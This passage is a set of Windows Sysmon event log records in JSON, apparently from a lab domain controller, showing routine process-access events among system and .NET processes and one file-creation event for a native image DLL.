{"EventTime":"2020-08-01 06:00:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8191,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:55.700\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:55.700","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8192,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:55.700\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-00103F1E0500}\r\nSourceProcessId: 2768\r\nSourceThreadId: 2656\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-0517-5F25-0000-0010892C1300}\r\nTargetProcessId: 4960\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:55.700","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-00103F1E0500}","SourceProcessId":"2768","SourceThreadId":"2656","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-0517-5F25-0000-0010892C1300}","TargetProcessId":"4960","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:57","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":8193,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 06:00:57.497\r\nProcessGuid: {A837DB8D-0513-5F25-0000-0010C9221300}\r\nProcessId: 4236\r\nImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\Temp\\108c-0\\System.Windows.Forms.dll\r\nCreationUtcTime: 2020-08-01 06:00:57.497","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 06:00:57.497","ProcessGuid":"{A837DB8D-0513-5F25-0000-0010C9221300}","Image":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\Temp\\108c-0\\System.Windows.Forms.dll","CreationUtcTime":"2020-08-01 06:00:57.497","EventReceivedTime":"2020-08-01 06:00:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:57","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8194,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:57.731\r\nSourceProcessGUID: {A837DB8D-040F-5F25-0000-0010414F0B00}\r\nSourceProcessId: 2732\r\nSourceThreadId: 2496\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-0519-5F25-0000-0010872F1300}\r\nTargetProcessId: 672\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+92bd7|C:\\Windows\\SYSTEM32\\ntdll.dll+c7734|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+abce(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+af4a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b1b4(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8f0a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8fe3(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+9082(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:57.731","SourceProcessGUID":"{A837DB8D-040F-5F25-0000-0010414F0B00}","SourceProcessId":"2732","SourceThreadId":"2496","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-0519-5F25-0000-0010872F1300}","TargetProcessId":"672","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+92bd7|C:\\Windows\\SYSTEM32\\ntdll.dll+c7734|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+abce(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+af4a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b1b4(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8f0a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8fe3(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+9082(wow64)","EventReceivedTime":"2020-08-01 06:00:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:57","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8195,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:57.731\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0519-5F25-0000-0010872F1300}\r\nTargetProcessId: 672\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:57.731","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0519-5F25-0000-0010872F1300}","TargetProcessId":"672","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:00:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:57","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8196,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:57.731\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-0519-5F25-0000-0010872F1300}\r\nTargetProcessId: 672\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:57.731","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-0519-5F25-0000-0010872F1300}","TargetProcessId":"672","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:57","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8197,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:57.903\r\nSourceProcessGUID: {A837DB8D-040F-5F25-0000-0010414F0B00}\r\nSourceProcessId: 2732\r\nSourceThreadId: 3272\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-04F8-5F25-0000-0010F3441200}\r\nTargetProcessId: 2936\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ae03(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c43d(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c4ad(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:57.903","SourceProcessGUID":"{A837DB8D-040F-5F25-0000-0010414F0B00}","SourceProcessId":"2732","SourceThreadId":"3272","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-04F8-5F25-0000-0010F3441200}","TargetProcessId":"2936","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ae03(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c43d(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c4ad(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:00:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:57","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8198,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:57.903\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-04F8-5F25-0000-0010F3441200}\r\nTargetProcessId: 2936\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:57.903","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-04F8-5F25-0000-0010F3441200}","TargetProcessId":"2936","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:00:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:57","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8199,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:57.919\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-0519-5F25-0000-001033331300}\r\nTargetProcessId: 2936\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 